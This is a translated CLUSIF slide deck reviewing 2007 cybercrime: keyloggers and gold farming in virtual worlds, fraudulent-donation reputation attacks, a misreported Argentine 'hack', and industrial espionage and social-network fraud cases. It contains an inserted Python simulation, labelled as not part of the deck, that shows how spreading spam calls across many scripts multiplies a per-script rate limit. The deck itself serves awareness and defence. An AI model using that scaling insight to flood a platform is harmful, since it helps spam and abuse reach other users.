
Cybercrime Overview

CLUSIF 2007: committed to information security

A non-profit association (created in the early 1980s)

Over 600 members (50% suppliers of goods and/or services, 50% CISOs, CIOs, managers…)

• Share information: exchanges among officially recognized experts, collective know-how, documentary resources
• Develop its positioning: feedback, increased visibility, directory of offering members
• Anticipate trends: the “network”, inform offerers of expectations
• Promote IS security

Join…

CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008
Cybercrime 2007

Working group dynamics

Active groups in 2008:
• Secured IS Center Design
• Computer Forensics
• Data Destruction and Recovery
• MEHARI Documentation
• PC Security Sheets
• Crisis Management
• Facilities Management
• MEHARI Integration
• CLUSIF Training Label
• 7799 Metrics
• Phreaking
• MEHARI 2007
• Cybercrime Overview

Free access to White Papers; translations in English; public stands taken on issues or requests for proposals.
Permanent exchange spaces: MEHARI, threats, Information Systems Security Managers.

Objectives of the Overview:

Evaluate the emergence of new risks and determine current trends in existing risks

Put into perspective events that have made headlines

Place “high tech” crimes in the same category as more traditional felonies

Contributions to the 2007 Overview

Selected by a diverse working group: insurers, lawyers, journalists, law enforcement officers, goods and service providers, CISOs

• AIG Europe
• CERT-IST
• CERT-LEXSI
• CIO
• McAfee
• National Criminal Investigation Directorate (OCLCTIC)
• National Gendarmerie
• Police prefecture (BEFTI)
• Quebec Provincial Police
• Orange
• Secuserve

The choice of topics and the statements expressed are not necessarily those of the companies and agencies that have participated in the working group.

Selection of media events

Presentation of an emerging risk, a trend, a volume of incidents.

Specific cases: impact or stakes, case study.

The images are all rights reserved. The information provided was taken from public sources. Companies are sometimes quoted for accuracy and because their names have already been mentioned in the media.

2006 in review

“Mules”: recruitment of private individuals
• 50 mules arrested in France
• 14 people arrested in Holland

Analysis of a case:
• The TJX case: over 94 million credit card numbers potentially compromised; $41 million settlement with banks
• Great Britain: disappearance of CD-ROMs (Her Majesty’s Revenue and Customs, driver’s licences)
• United States: misuse and sale of over 8 million customer files by a database administrator
• TD Ameritrade: fraudulent use of over 6 million customer files

2006 in review

Vulnerabilities and “0-day” attacks: auction site used to sell exploits

2002-2005 in review

2002 Overview. February: several DNS servers were the target of an attack… without consequences

2005 Overview. The first Master Boot Record (MBR) rootkit, based on a proof of concept (PoC) from 2005?

Webography

http://www.channelregister.co.uk/2007/12/20/arrests_in_money_mules_scam/
http://www.zdnet.fr/actualites/imprimer/0,50000200,39370751,00.htm
http://www.efluxmedia.com/news_More_than_94_Million_Credit_Card_Accounts_Compromised_by_TJX_Theft_09934.html
http://www.channelregister.co.uk/2007/12/03/tjx_settlement_agreement/
http://afp.google.com/article/ALeqM5ifk5W3510NgcvhvLez1qxgFdraRQ
http://www.theregister.co.uk/2007/11/20/hmrc_huge_data_loss/
http://www.theregister.co.uk/2007/12/11/driver_data_discs_disaster/
http://www.channelregister.co.uk/2007/12/04/admin_steals_consumer_records/
http://www.theregister.co.uk/2007/09/15/ameritrade_database_burgled/
http://www.zdnet.fr/actualites/imprimer/0,50000200,39366862,00.htm
http://www.zdnet.fr/actualites/imprimer/0,50000200,39367768,00.htm
http://www.news.com/8301-10789_3-9848029-57.html
http://securitywatch.eweek.com/exploits_and_attacks/stealthy_mbr_rootkit_takes_aim_at_windows_vista.html
http://sip.tmcnet.com/news/2008/01/10/3205912.htm

2007 Overview

Virtual worlds: the lure of profits

Disrupt, destabilize…
• Reputation attacks
• Hacking to focus attention?
• Industrial espionage
• Social networking, opportunities for fraud/information theft

2007 Overview

Sophistication of attacks

Malicious intent on eCommerce
• Credit card fraud via
• Scams via auction sites

Notable events
• “Cyberwar” in Estonia
• “Chinese” cyberattacks
• Security stakes for SCADA infrastructures

Virtual Worlds: the lure of profits

Earning and spending money are the two main concerns of residents.

Virtual Worlds

At the crossroads of massively multiplayer online games and social networking, virtual worlds have gained enormous popularity.

Gartner predicts that 80% of active Internet users will have a “second life” in a virtual world by 2011.

Virtual Worlds

These are constantly growing worlds, populated by programs that simulate characters and by avatars, lifelike images of connected users.

Types of access:
• totally free, F2P (Free to Play)
• restricted in the free version, B2P (Buy the game to Play)
• requires payment, P2P (Pay to Play)

Virtual Worlds

• The massively multiplayer online role-playing games (MMORPG) outnumber the rest
• 122 references on MMOGData

The 10 main virtual worlds (name, category):
Dofus
Entropia Universe
Final Fantasy XI
Guild Wars
Knight Online
Lineage
Lineage II
Runescape
Second Life (Social)
World of Warcraft

Categories used in the chart: Fantasy, Role playing, Sci-Fi (futuristic world), Social, Sports, Fight simulation, Super Hero, Others.

Fantasy: mythical universe combining heroes, warriors, magic and witchcraft, ancient cultures and supernatural elements.

Virtual Worlds

• 100,000 premium accounts (requiring payment) in Second Life
• Over 4 million free accounts
• 8.5 million premium accounts opened for WoW

Virtual Worlds = Virtual Currency

Inhabitants spend a lot of energy, time and money in virtual worlds. Their virtual money, objects, relationships and even “powers” are envied. Over 1.5 million dollars change hands daily on Second Life.

Game | Currency
Dofus | Kamas
Entropia Universe | PED
Final Fantasy XI | Gil
Guild Wars | Gold
Knight Online | US Dollars
Lineage II | Adena
Runescape | Gold
Second Life | Linden Dollar
World of Warcraft | Gold

All currencies are convertible. The exchange rate varies depending on the site.

Virtual Worlds

Certain lands and characters are coveted and sometimes for sale.

Zeuzo, a “rogue night elf”, was recently sold for € 7,000 on eBay. This character owned an exceptionally rare weapon: one of the only two existing Warglaives of Azzinoth.

Virtual Worlds

Gold keylogging (PWS – PassWord Stealer)

• They target the financial world: PWS-BANKER
• They target cached passwords: PWS-LDPINCH
• They capture passwords without discernment: KEYLOG-ARDAMAX
• Over 30% of them target virtual worlds: PWS-MMORPG, PWS-LINEAGE, PWS-LEGMIR, PWS-GAMANIA, PWS-WOW

[Chart: number of classified PWS variants per quarter (Q1 to Q4 2007, scale 0 to 25,000) for PWS-BANKER, PWS-MMORPG, PWS-LDPINCH, PWS-LINEAGE, PWS-LEGMIR and KEYLOG-ARDAMAX]

Virtual Worlds

Gold keylogging (virus)

Complexity
• Rootkit technology (W32/Detnat)
• Stealthy and polymorphic (W32/Bacalid)

Several variants
• W32/HLLP.Philis
• W32/Fujacks

Number of variants over the period:

Virus | 2005 | 2006 | Q1-Q3 2007
W32/HLLP.Philis | 18 | 158 | 377
W32/Fujacks | 0 | 0 | 511

Virtual Worlds

Gold

WoW players received this e-mail in October 2007.

Source: http://exodus.superforum.fr/news-f11/warning-keylogger-t2056.htm

Thinking they were connecting to the link provided, they were actually redirected to a mirror site resembling a Blizzard site.

It requested players’ login information as well as their CD key!

In early November, a 17-year-old teenager from the Netherlands was arrested at his parents’ home by real police officers for stealing… virtual furniture. Using a mirror site, he and five friends were accused of making off with € 4,000 in e-furniture that its owners had purchased with real money.

Virtual Worlds

Gold farming: as in the textile industry, teenagers are exploited to collect virtual money.

• It is not a game
• 12 hours/day
• 7 days/week
• 25 cents/hour
• They too use “bots”
• The virtual gold collected is transferred to brokers who sell it and keep the profits.

Note: in the world of online gaming, a bot is a program that can play in place of a human.

New York Times video source: http://www.mathewingram.com/work/2007/06/17/new-york-times-portrait-of-a-virtual-sweatshop/

Virtual Worlds

Gold farming: major international service providers for players and publishers of massively multiplayer online role-playing games have been pointed out.

Virtual Worlds

Virus anecdotes

In 2005, a fatal “real pathogenic virtual bug” caused a viral epidemic in World of Warcraft, killing players under level 50. Its origin was thought to be linked to a patch that added a new dungeon online. In this dungeon, players/spare-time coders seemed to have tampered with the “Corrupted Blood” curse by making it highly contagious. The designers created “quarantine areas” where players resigned themselves to dying without contaminating “healthy” persons.

[Image: Blood God Hakkar (www.wowwiki.com)]

In 2006, Second Life temporarily shut down following the appearance of a virus in the form of a gold ring that would double once it was touched. In no time, the servers were considerably slowed down.

In August 2006, the first viruses targeting Lua scripts appeared. Since then, viruses and (fake) anti-viruses have been circulating on this platform.

Virtual Worlds

Scripting languages (open source) used for these worlds enable impressive animation and activities.

In LSL (Linden Scripting Language), the old functions used to visualize explosions (llMakeFire, llMakeExplosion, llMakeSmoke) have been abandoned for a more developed function (llParticleSystem).

Rest assured, if you are killed in Second Life, all you need to do is close the game and relaunch it to be reborn.

Virtual Worlds

Scripting languages (open source) used for these worlds could make it possible to replicate attacks well known on the traditional Internet. Some functions to watch:

• Sending e-mail: llEmail. To protect against spam, the script is paused for 20 seconds between two sendings.

Examples of unsolicited group invitations:
“Maxel Cortes has invited you to join a group. This group was created to post sales announcements: land, objects, clothing… in short, anything that can be sold… and even to post announcements if you are looking for something… So don’t hesitate!!!!!!”
“Ameno Heron has invited you to join a group. Advertise without restriction, without restraint, anything goes: info, docs, landmarks, sales, rentals, info of all kinds”

• Sending an XML-RPC request: llSendRemoteData. To protect against DDoS attacks, the script is paused for 3 seconds between two requests.
• HTTP interface: llHTTPRequest, llLoadURL. 1-second pause.
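As an added example (not from the CLUSIF deck and not Linden Lab code), the following Python models the per-script pause described above and shows what it does and does not bound: one script is capped at a few calls per minute, but the cap is per script, so an attacker who spreads the same calls across many scripted objects multiplies the achievable rate. The pause values are the ones quoted on the page; the script identifiers, request lists and window sizes are constructed for the example.

```python
"""Model of per-script call throttling as described for LSL (added example).

Each throttled function puts the calling script to sleep for a fixed number
of seconds after the call, so one script cannot issue its next call before
the pause has elapsed. The delays are those quoted on the page; everything
else (script ids, request lists, windows) is constructed for illustration.
"""
from collections import defaultdict
from typing import Dict, List, Tuple

# Pause (seconds) a script incurs after each call, as stated on the page.
SCRIPT_DELAY: Dict[str, float] = {
    "llEmail": 20.0,           # anti-spam pause
    "llSendRemoteData": 3.0,   # anti-DDoS pause (XML-RPC)
    "llHTTPRequest": 1.0,
    "llLoadURL": 1.0,
}

Request = Tuple[str, str]            # (script_id, function name)
Sent = Tuple[float, str, str]        # (time, script_id, function name)


def simulate(requests: List[Request]) -> List[Sent]:
    """Replay requests, every script running as fast as the throttle allows.

    Each script starts at t=0 and issues its requests in order; after each
    call it sleeps SCRIPT_DELAY[function]. Scripts do not delay each other.
    Returns one (time, script_id, function) entry per call that goes out,
    sorted by time.
    """
    next_free: Dict[str, float] = defaultdict(float)  # per-script clock
    sent: List[Sent] = []
    for script_id, fn in requests:
        if fn not in SCRIPT_DELAY:
            raise ValueError(f"no throttle defined for {fn}")
        t = next_free[script_id]
        sent.append((t, script_id, fn))
        next_free[script_id] = t + SCRIPT_DELAY[fn]
    sent.sort()
    return sent


def peak_in_window(sent: List[Sent], fn: str, window: float) -> int:
    """Largest number of `fn` calls landing in any half-open window [t, t+window)."""
    times = [t for t, _, f in sent if f == fn]  # already sorted by simulate()
    best = 0
    j = 0
    for i, start in enumerate(times):
        while j < len(times) and times[j] < start + window:
            j += 1
        best = max(best, j - i)
    return best


def spam_capacity(n_scripts: int, fn: str, window: float) -> int:
    """Peak `fn` calls per window when n_scripts scripts each hammer it.

    The per-script pause caps a single script at roughly window/delay calls;
    the cap is per script, so the total grows linearly with n_scripts.
    """
    burst = int(window // SCRIPT_DELAY[fn]) + 2  # enough calls to overrun the window
    requests = [(f"obj{i}", fn) for i in range(n_scripts) for _ in range(burst)]
    return peak_in_window(simulate(requests), fn, window)


if __name__ == "__main__":
    for n in (1, 10, 100):
        print(f"{n:>3} script(s): up to {spam_capacity(n, 'llEmail', 60.0)} llEmail calls per minute")
```

The per-script pause is a fairness mechanism for the simulator, not a limit on the attacker: the same budget of 3 mails per minute per script becomes 300 per minute across 100 scripted objects, which is why abuse controls also need per-owner, per-region or per-destination limits.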

Virtual Worlds

Adult sex business and child pornography are commonplace. Is a virtual crime punishable in the real world?

After a character in the virtual game Second Life was raped, the Brussels criminal police opened an investigation and put the Federal Computer Crime Unit in charge of the case.

Taken from the Sky News video: http://news.sky.com/skynews/article/0,,30100-1290719,00.html

Virtual Worlds

Positive aspects

• A meeting and exchange place; once VoIP functionalities are installed, only a microphone is necessary to participate in group exchanges
• An exhibition showcase for artists and companies
• An innovation area for manufacturers, political organizations, associations, universities, libraries and researchers

Webography

MMOGData (Online Data About Online Games): http://mmogdata.voig.com/
New York Times: Portrait of a virtual sweatshop: http://www.mathewingram.com/work/2007/06/17/new-york-times-portrait-of-a-virtual-sweatshop/
La Federal Computer Crime Unit enquête sur un viol dans Second Life: http://www.7sur7.be/hlns/cache/fr/det/art_439417.html
Perverts Use Virtual World For Fantasies: http://news.sky.com/skynews/article/0,,30100-1290719,00.html
Délinquance virtuelle sur internet : Habbo et Second Life dans le viseur...: http://www.mylittlebuzz.com/?post/Delinquance-virtuelle-sur-internet-%3A-Habbo-et-Second-Life-dans-le-viseur-422
Les mondes virtuels : En attendant le Metaverse: http://stephanebayle.typepad.com/sl_business_review/Orange-Metaverse.pdf
WoW : grippe avata-viaire ?: http://www.presence-pc.com/actualite/World-Warcraft-11915/
Virus: Second Life ferme temporairement: http://techno.branchez-vous.com/actu/06-11/10-335701.html
Second Life Gets Nuked: http://kotaku.com:80/gaming/second-life/second-life-gets-nuked-239406.php
Second Life, une seconde économie: http://www.lemonde.fr/web/article/0,1-0@2-651865,36-937980,0.html
Arrêté pour un vol de meubles virtuels: http://tf1.lci.fr/infos/high-tech/0,,3623679,00-arrete-pour-vol-meubles-virtuels-.html
Just Killin': Avatar Murder: http://www.secondlifeinsider.com/2007/03/08/just-killin-avatar-murder/
Recommandation du Forum des droits sur l’internet « Jeux vidéo en ligne : Quelle gouvernance ? »: http://www.foruminternet.org/specialistes/concertation/recommandations/recommandation-du-forum-des-droits-sur-l-internet-jeux-video-en-ligne-quelle-gouvernance.html

Panorama 2007

Virtual Worlds: the lure of profits

Disrupt, destabilize…
• Reputation attacks
• Hacking to focus attention?
• Industrial espionage
• Social networking, opportunities for fraud/information theft

Disrupt, destabilize

1) Reputation attacks

- CastleCops was the victim of several distributed denial of service (DDoS) attacks in 2007
- Other anti-spam and anti-phishing organizations were also hit by distributed denial of service attacks this year
- After the denial of service, CastleCops was involved in a strange case

Disrupt, destabilize

Although these denial of service attacks regularly target anti-spam and anti-phishing organizations, CastleCops was also hit by another, more surprising form of attack soon afterwards:

An attack on its reputation.

Disrupt, destabilize

- Paypal payments were made to CastleCops.
- These donations partly came from bank accounts whose details had been obtained through phishing.
- Donations ranged from $1 to $2,800.

Disrupt, destabilize

- CastleCops was faced with complaints and insults from the debited account holders.
- They thought CastleCops was the obvious culprit, helping itself to their accounts.

Disrupt, destabilize

- September 14, 2007: Paul Laudanski, co-founder of CastleCops, made a statement on the Web site.
- He explained that CastleCops was the unwilling recipient of the fraudulent donations.
- In fact, they were suspected of fraud simply because they were receiving these “donations”.
- This case could only serve to discredit CastleCops.

Disrupt, destabilize

- In this case, CastleCops was a victim, like the debited account holders and Paypal.
- Brian Krebs described this event as a “reputation attack” in the Washington Post Security Fix blog in September 2007.
- The reputation of CastleCops was indeed smeared (even if temporarily) out of malice.

Disrupt, destabilize

- Other problems also ensued for CastleCops.
- It was forced to spend its time, resources and money to deal with the account holders, carry out verifications, examine accounting records, reimburse the rightful owners, endure complaints, file a complaint itself, give explanations, etc.

Disrupt, destabilize

CastleCops also faced the temporary suspension of its account, as Paul Laudanski explained:

“As a result our account was frozen so we could not receive any donations until it was determined that we were also a victim.”

Disrupt, destabilize

Was CastleCops the sole target?

Other organizations fell prey to DDoS attacks around the same time, such as: spamhaus.org, spamnation.info, aa419.org, 419eater.com, scamwarners.com, killspammers, fraudwatchers.org, ScamFraudAlert.com, antispam.de

Did they also receive fraudulent donations?

Disrupt, destabilize

With this type of fraud, which can transfer suspicion to a third party and smear its reputation: are we witnessing a new form of destabilization? How common is it?

Another case was reported in 2007: fraudulent donations of $5 to $3,000 were made to Ron Paul, the Republican candidate from Texas.

Disrupt, destabilize

Is it just a matter of reputation attacks? Or is it a way of checking the validity of the stolen credit card information? Or are the perpetrators testing the fraud detection systems of financial institutions (range of amounts)? Or all of this at once?

Disrupt, destabilize

Webography
http://www.castlecops.com/a6827-eChecks_and_Credit_Charges_%E2%80%93_I_Didn%E2%80%99t_Authorize_That.html
http://blog.washingtonpost.com/securityfix/2007/09/the_danger_of_reputation_attac.html
http://news.zdnet.co.uk/security/0,1000000189,39289509,00.htm
http://www.theregister.co.uk/2007/09/21/castlecops_fraudulent_donation/
http://www.reporternews.com/news/2007/nov/21/fraudulent-donations-made-to-ron-paul/?printer=1/

Disrupt, destabilize

2) Hacking to focus attention?

One of the goals of the Cybercrime Overview is to put back into context (where necessary) and put into perspective certain stories that made the news last year. Here is one pertinent case.

Disrupt, destabilize

A news story published in 2007 captured our attention. It concerned a security issue that could have had destabilizing consequences for the economy of an entire country.

On February 24, 2007, we learned that:

Disrupt, destabilize

“A hacker has played a trick on Argentinian drivers”: the Web site of the Secretary of Energy had been “hacked into”, and gas stations had been deleted from the official list of fuel deliveries, depriving a thousand gas stations of fuel in Argentina.

Disrupt, destabilize

The story was published by several media sources in Argentina, such as the major newspapers Clarín and La Nación, and the French-language reports, successively duplicated by news Web sites and blogs, all spoke of hacking. Headlines such as “Argentina: national gas distribution paralyzed by a hacker” had readers imagining the panic of drivers and the authorities preparing for combat.

Disrupt, destabilize

This story interested us in our study of cybercrime and we decided to find out more. To do so, we went back to the sources of the information published in Argentina by the local media and encountered several surprises. On that same February 24, 2007, the Argentinian press agency TELAM spoke of a “computer error” instead of hacking, and of 3,000 stations deleted rather than the one thousand reported by the French Web sites.

Disrupt, destabilize

The Argentinian media that had first reported that the Secretary of Energy Web site was hacked published corrections and denials the same day:
- No hacking
- No computer error
- The deleted gas stations were rightly removed from the supply list because they were not in compliance with regulations

Disrupt, destabilize

And since several French-language Web sites stuck with the initial news of hacking without publishing or pointing readers to the corrections, it seems that the follow-up of the story’s developments was disrupted…

A disruption that was likely due to the absence of French translations of the subsequent denials published by the Argentinian media.

Disrupt, destabilize

But how did this hacking story come about? The first source of information for the Argentinian media was a news release issued by the Federation of Fuel Industrialists of the Republic of Argentina (FECRA). It was the FECRA that informed the press of the deletion of gas stations from the list published on the Secretary of Energy Web site. It was also the FECRA that was cited as the source for the report of hacking in the media.

Disrupt, destabilize

Questioned several times by Argentinian journalists on that same February 24, 2007, the FECRA would finally state that the Secretary of Energy system had been neither hacked nor affected by a computer error. It would declare that it had been misled by news published on a third-party Web site (we did not find this information when we visited the site in January 2008).

In the course of one morning, February 24, 2007, news of hacking created a fever and then disappeared.

Disrupt, destabilize

But perhaps it is useful to focus on the context in which the news of hacking was launched.

Argentinian hackers are certainly active, but most importantly, around the time the story was published, relations were tense between professionals of the fuel distribution sector in Argentina and the authorities.

The professionals stated that their initiative was intended to force progress in their dealings with the Secretary of Energy.

Disrupt, destabilize

We can make a tentative hypothesis:

A pseudo-hacking at the right moment to focus the attention of the population, destabilize the Secretary of Energy and accelerate the start of negotiations?

Maybe yes, maybe no…

Regardless, it can be useful to know what elements were missing from the initial story, at the risk of having to requalify the nature and extent of an event.

Disrupt, destabilize

Webography
http://fr.news.yahoo.com/24022007/202/un-hacker-joue-un-vilain-tour-aux-automobilistes-argentins.html
http://www.telam.com.ar/vernota.php?tipo=N&dis=27&sec=3&idPub=89413&id=133318
http://www.telam.com.ar/vernota.php?tipo=N&dis=27&sec=3&idPub=89413&id=133333
http://www.telam.com.ar/vernota.php?tipo=N&dis=27&sec=3&idPub=89413&id=133409
http://www.clarin.com/diario/2007/02/24/um/m-01369551.htm
http://www.lanacion.com.ar/886424
http://www.perfil.com/contenidos/2007/02/24/noticia_0020.html
http://www.justiniano.com/noticias/magazine/MAGAZINE163.htm

Acknowledgments to Laura Joltac, Mornay Group.

Disrupt, destabilize

3) Industrial espionage

The volume of industrial espionage cases grows every year and 2007 is no exception. For companies, one of the most worrisome forms of industrial spying concerns cases committed by their own employees. The cases discussed here illustrate this problem. Thus 2007 was a “007” year between certain giants of Formula 1 suspected of industrial espionage:
- McLaren and Ferrari
- Renault F1 and McLaren

Disrupt, destabilize

These are two ongoing cases of employees leaking strategic information.

Because they are still pending, it is important to remain cautious until subsequent developments are known and any rulings rendered.

Disrupt, destabilize

1st case: Ferrari-McLaren

Summer 2007: Ferrari accuses McLaren-Mercedes of spying. Mike Coughlan, designer of the single-seaters driven by Alonso and Hamilton at McLaren, was suspected of receiving classified information on the F2007 from Nigel Stepney, chief technician at Ferrari. The Fédération Internationale de l’Automobile (FIA) took on the case pursuant to Article 151c of its Sporting Code, which prohibits any act prejudicial to the image of the Championship or of F1 in general.

Disrupt, destabilize

According to documents published by the FIA in 2007:
- There may have been communication between Nigel Stepney (then at Ferrari) and Mike Coughlan (then chief designer at McLaren) between March and May 2007.
- Hundreds of telephone calls, e-mails and SMS were exchanged between the two men, during which Nigel Stepney may have shared strategic and confidential technical information on Ferrari.

Disrupt, destabilize

- The FIA stated that it had received proof that Mike Coughlan supplied a McLaren driver with information on Ferrari, which was then passed on to another driver.
- The case came to light when an employee of a photocopy shop in Great Britain noticed someone making copies of documents bearing the Ferrari letterhead and asking to have the data saved on CD.
- Intrigued, the shop employee contacted Ferrari. According to RTL radio, the person making the copies was Mike Coughlan’s wife.

Disrupt, destabilize

During a search of Mike Coughlan’s home, investigators found two CD-ROMs and 780 pages of confidential Ferrari research documentation. How did this information find its way into the hands of a top employee of the rival team McLaren? Was there a spy at Ferrari? Suspicion fell on the performance development chief, the Briton Nigel Stepney, who claimed his innocence, denying having copied or sent anything.

Disrupt, destabilize

The FIA decided to exclude McLaren-Mercedes from the 2007 World Constructors’ Championship. McLaren lost all its points in the constructors’ standings and was hit with a $100 million fine by the FIA. McLaren offered its apologies to Ferrari. This was the sporting component of the case, handled by the FIA.

Disrupt, destabilize

But at the time of publication of this 2007 Cybercrime Overview, the legal component was still before the courts in Italy, following the complaint filed by Ferrari.

“The incident is closed from the sporting perspective, but criminal investigations are still pending in Italy and a civil investigation is also ongoing in England,” said the Italian team, as reported by AFP. “It is an acknowledged fact that classified information, the property of Ferrari, was circulated throughout the structures of the English team,” Ferrari nevertheless restated.

Disrupt, destabilize

The two constructors, McLaren and Ferrari, were both heavily affected by this case. For McLaren, the consequences in 2007 were:
- A ruined image
- Exclusion from the 2007 Constructors’ Championship
- Financial expenses undertaken at a loss?
- Accusation in a criminal investigation

Disrupt, destabilize

2nd case: McLaren-Renault F1

- McLaren accused Renault of spying before the FIA.
- A former senior employee, the English engineer Philip Mackereth, who left to work at Renault in September 2006, allegedly passed confidential plans and sketches to Renault.


According to FIA documents, these included 18 drawings, with copies on 11 disks. In particular, the FIA reported that Philip Mackereth made a screen capture of a sensitive document while still at McLaren. He reportedly e-mailed it to his personal address, then later sent it from home to his work address at Renault. Philip Mackereth acknowledged these facts before the FIA.

In early December 2007, the FIA World Council found Renault F1 guilty of violating Article 151c of the International Sporting Code by being in possession of documents belonging to McLaren. Given the limited number of documents involved and the absence of proof that any advantage had been obtained, the FIA did not penalize Renault. But the FIA announced that if evidence were to surface showing that Renault had benefited from the technical data provided by Phil Mackereth, it would reopen the case.

Although the two cases, McLaren/Ferrari and Renault/McLaren, both involved alleged leaks of information by senior employees for the benefit of a rival, one difference should be stressed concerning Renault, which declared in a press release quoted by the newspaper L'Equipe on November 8, 2007: "Since this problem was brought to our attention, we have acted with complete transparency with regard to McLaren and the FIA, and we will continue to do so."


Other significant cases of espionage by employees made news in 2007, including:
- Theft of DuPont trade secrets
- Theft of Duracell trade secrets


3rd case: Theft of DuPont trade secrets by an ex-employee

This case has already been tried. In November 2007, Gary Min, a former chemist at DuPont (United States), was sentenced to 18 months in prison, fined $30,000 and ordered to pay $14,500 in damages to DuPont for stealing company secrets.

He joined DuPont (United States) as a research chemist in 1995. In 2005, he entered into discussions with another company, Victrex PLC, about a job in Asia. Min downloaded 22,000 abstracts and accessed more than 16,000 DuPont documents. Alerted by the volume of these queries against its electronic library, DuPont contacted the FBI. Soon after arriving at Victrex, the former DuPont employee loaded 180 documents onto his work laptop. Informed of Gary Min's actions by DuPont, Victrex seized the laptop and handed it over to the FBI.

The November 15, 2006 statement by the Department of Justice (District of Delaware) specified that at Min's home, FBI agents found:
- Several computers containing DuPont documents labeled "confidential"
- A wiping program, launched to erase one of the computers' hard disks as the agents arrived at his home
- Numerous garbage bags containing shredded DuPont technical documents
- Burned remnants of DuPont documents in the fireplace


4th case: Theft of trade secrets at Duracell

The case was ruled on in 2007. A former Duracell employee, Edward Grande, pleaded guilty in February 2007 for the theft of trade secrets and was sentenced in May 2007. He was accused of having downloaded and copied onto his computer research documents on Duracell AA batteries when he was working at Duracell.


To get the data out, he sent it to his personal e-mail address.

Then he attempted to sell this information on his own initiative to two rival companies that returned it to Duracell.

Edward Grande was sentenced in May 2007 to five years of probation, fined $7,500 and ordered to perform 200 hours of community service.

Webography on the Formula 1 case
http://www.fia.com/public/mclaren.pdf
http://www.fia.com/mediacentre/Press_Releases/FIA_Sport/2007/December/071207-01.html
http://www.fia.com/mediacentre/Press_Releases/FIA_Sport/2007/December/131207-01.html
http://www.fia.com/public/Transcript_6-Dec_2007.pdf
http://afp.google.com/article/ALeqM5go5VyWErN0MfqmPxllFahXu88-8w
http://www.rtl.fr/info/article.asp?dicid=561466
http://www.lequipe.fr/Formule1/breves2007/20070913_193712Dev.html
http://www.01men.com/edito/f1-live-formule-1-racing-live-071206200352/espionnage-mclaren-renault-fautif/
http://www.lequipe.fr/Formule1/breves2007/20070708_130452Dev.html
http://www.lastampa.it/sport/cmsSezioni/formula1/200709articoli/10565girata.asp
http://observer.guardian.co.uk/sport/story/0,,2170261,00.html
http://sport.guardian.co.uk/motorsport/story/0,,2168805,00.html


Webography on the theft of DuPont trade secrets
http://www.bis.doc.gov/news/2007/doj02_15_07.htm
http://www.iht.com/articles/ap/2007/11/07/business/NA-FIN-US-DuPont-Trade-Secrets.php
http://www.informationweek.com/news/showArticle.jhtml?articleID=202804057
http://www.delawareonline.com/apps/pbcs.dll/article?AID=/20071107/NEWS/711070395


Webography on the theft of Duracell trade secrets
http://www.usdoj.gov/criminal/cybercrime/grandePlea.htm
http://www.washingtonpost.com/wp-dyn/content/article/2007/02/02/AR2007020200906.html
http://www.reuters.com/article/consumerproducts-SP/idUSN1848939920070518?sp=true
http://weblog.infoworld.com/techwatch/archives/011958.html


4) Social networking, opportunities for fraud

Social networking on the Internet allows individuals to get in touch, share interests, expand their circle of contacts, meet others, communicate and make themselves known.


There are numerous social networking sites, and new ones are created all the time. The craze for these sites attracts many users, sometimes adding up to millions of registered users on a single network, many of whom are registered on more than one. Social networks can be classified by purpose:
- Professional (examples: LinkedIn, Viadeo)
- Reunion (examples: Classmates, Copainsdavant, Trombi)
- Photo sharing (Flickr)
- Sharing interests and hobbies (Facebook), exhibiting one's work (MySpace)

The distinction between professional, reunion and interest/hobby networks tends to blur, since certain social networking sites describe themselves as a combination of "business and hobbies" (MyCorners.com) or become multipurpose by gradually adding new features.


The economic model of social networking sites varies: access is either free (Flickr), free for basic access and subscription-based for premium service (for example, to contact people directly on Copainsdavant, Trombi), or subscription-based where the users are left to decide on the price (6nergies.net), etc.

Most of these sites derive their resources from user subscriptions and advertising revenue.

Users provide so much personal information that highly detailed profiles can be built on them, without their realizing the potential for exploitation.

The security of these networks, where personal and professional data abound, has caused concern. Certain events in 2007 demonstrated the pertinence of these concerns. Here are just a few examples:

Fraudulent access:

In June 2007, Facebook filed a suit against unknown persons for unlawfully attempting to access its computer system. A company in the pornography business is allegedly implicated in this case.


Personal data and private life in the line of sight: Facebook was also harshly criticized in 2007 for an excessively intrusive feature. Its Beacon application automatically broadcast information about a user's online purchases to his or her friends, without giving the user any choice over which information could be broadcast.

Imposture and bad encounters:

Although most social networking sites require users to provide genuine and accurate data, meeting people on these sites or elsewhere on the Internet involves the risk of imposture and bad encounters.

In 2007, a 13-year-old girl committed suicide in the United States after an online romance ended with a friend she made on MySpace. This friend, “Josh” was revealed to be a 47-year-old woman living nearby. She was not charged.


Infections:

In 2007, decoy MySpace pages advised users to download a (fake) codec (decoding software) in order to watch videos. Users who did so were in fact redirected to a Web site that downloaded a Trojan horse. MySpace explained that the infected pages on its site were the result of phishing e-mails sent to Internet users.


In conclusion, the risks are high because of the sheer number of users. People who frequent social networking sites do not always realize that they give away too much information about themselves, and this overly personal information may one day be turned against them. A network of professional contacts can make it difficult to keep (parts of) organization charts and projects discreet, and may facilitate intelligence profiling.


Webography
http://www.theregister.co.uk/2007/12/17/facebook_hack_attack_lawsuit/
http://docs.justia.com/cases/federal/district-courts/california/candce/5:2007cv03404/193531/17/0.pdf
http://www.juriscom.net/actu/visu.php?ID=1004
http://www.lemondeinformatique.fr/actualites/lire-top-10-de-2007-facebook-expose-tous-les-exces-des-reseaux-sociaux-24982.html
http://www.csis.dk/dk/forside/LinkedIn.pdf
http://www.viadeo.com/aide/cgv/
http://www.facebook.com/terms.php
http://www.enisa.europa.eu/doc/pdf/deliverables/enisa_pp_social_networks.pdf


Webography (cont'd.)
http://www.internetactu.net/2007/11/20/reseaux-sociaux-quand-les-utilisateurs-sen-fichent/
http://www.francesoir.fr/faits-divers/2007/12/01/elle-drague-une-ado-sur-le-web-et-cause-son-suicide.html
http://www.01net.com/editorial/364586/la-page-myspace-d-alicia-keys-infectee-par-un-malware/
http://www.theregister.co.uk/2007/09/05/facebook_public_access/
http://www.theregister.co.uk/2007/07/31/facebook/
http://www.lemondeinformatique.fr/actualites/lire-le-web-20-favoriserait-la-fuite-d-informations-22459.html

2007 Overview

Sophistication of attacks

Malicious intent on eBusiness: credit card fraud via the Internet, scams via auction sites

Notable events: "cyberwar" in Estonia, "Chinese" cyberattacks, security stakes for SCADA infrastructures

Agenda

- iFraming, the Italian Job, MPack…
- Storm Worm and fast flux
- "Questionable" activities: domain tasting, the Russian Business Network (RBN)…

IFRAME: definition

